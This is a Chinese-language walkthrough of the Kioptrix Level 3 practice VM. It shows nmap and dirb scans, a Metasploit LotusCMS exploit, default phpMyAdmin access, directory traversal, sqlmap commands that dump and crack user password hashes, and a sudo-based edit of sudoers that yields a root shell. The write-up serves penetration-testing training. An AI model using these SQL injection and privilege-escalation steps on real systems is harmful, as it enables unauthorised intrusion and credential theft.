Kioptrix VM3
kali IP 192.168.1.128
靶机IP 192.168.1.132
本靶机需要在主机绑定host,要不然web页面加载不全。
扫描端口
sudo nmap --min-rate 10000 -p- 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:06 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -O -p22,80 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:07 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:12:6B:8E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sU -p22,80 192.168.1.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 09:08 CST
Nmap scan report for bogon (192.168.1.132)
Host is up (0.00032s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
访问web页面
有个登录界面 ,LotusCMS搭建,看一下这个CMS详细信息 有没有往期漏洞,同时扫描下目录
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Aug 28 09:13:34 2023
URL_BASE: http://192.168.1.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.132/ ----
==> DIRECTORY: http://192.168.1.132/cache/
==> DIRECTORY: http://192.168.1.132/core/
+ http://192.168.1.132/data (CODE:403|SIZE:324)
+ http://192.168.1.132/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.1.132/gallery/
+ http://192.168.1.132/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.1.132/modules/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/
--> Testing: http://192.168.1.132/servers
+ http://192.168.1.132/server-status (CODE:403|SIZE:333)
==> DIRECTORY: http://192.168.1.132/style/
---- Entering directory: http://192.168.1.132/cache/ ----
+ http://192.168.1.132/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.1.132/core/ ----
==> DIRECTORY: http://192.168.1.132/core/controller/
+ http://192.168.1.132/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.132/core/lib/
==> DIRECTORY: http://192.168.1.132/core/model/
==> DIRECTORY: http://192.168.1.132/core/view/
---- Entering directory: http://192.168.1.132/gallery/ ----
+ http://192.168.1.132/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.1.132/gallery/photos/
==> DIRECTORY: http://192.168.1.132/gallery/themes/
---- Entering directory: http://192.168.1.132/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/ ----
+ http://192.168.1.132/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.1.132/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.1.132/phpmyadmin/js/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/lang/
+ http://192.168.1.132/phpmyadmin/libraries (CODE:403|SIZE:340)
+ http://192.168.1.132/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.132/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.1.132/phpmyadmin/themes/
---- Entering directory: http://192.168.1.132/style/ ----
+ http://192.168.1.132/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.1.132/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/controller/ ----
+ http://192.168.1.132/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/lib/ ----
+ http://192.168.1.132/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/model/ ----
+ http://192.168.1.132/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/core/view/ ----
+ http://192.168.1.132/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.132/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.132/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Aug 28 09:14:12 2023
DOWNLOADED: 46120 - FOUND: 17
打开所有目录,发现有报错回显,暴露物理路径
发现另一个登录框
http://192.168.1.132/phpmyadmin
先不管了,试试找到的漏洞18565.rb
用msf的这个洞直接就能拿到www账户的权限,之后提权和下面的步骤一样
再看看phpmyadmin这边,发现默认账户+空密码可以登录,但是无敏感数据,
查询语句没有写入权限。
同时发现主页面可以进行目录遍历,访问了passwd
http://192.168.1.132/gallery/gallery.php?id=1
扔sqlmap,爆出账号密码
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 --dbs
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery --tables
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns
sqlmap -u http://192.168.1.132/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C "id,username,password" --dump
结果:
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
发现账号和之前passwd中账号相同,尝试登录ssh成功。
两个账号都可以登录,suid提权失败,查询提权信息
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04.3 LTS
Release: 8.04
Codename: hardy
其中loneferret账号下有文件,按照提示执行命令,报错
ls
checksec.sh CompanyPolicy.README
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
sudo ht
Error opening terminal: xterm-256color.
百度解决方法
loneferret@Kioptrix3:~$ export TERM=xterm
重新执行sudo ht,打开一个新的终端,是一个root权限的文本编辑器。
F3将当前账户加上/bin/bash字段,F2保存后退出
sudo /bin/bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
发现提权成功。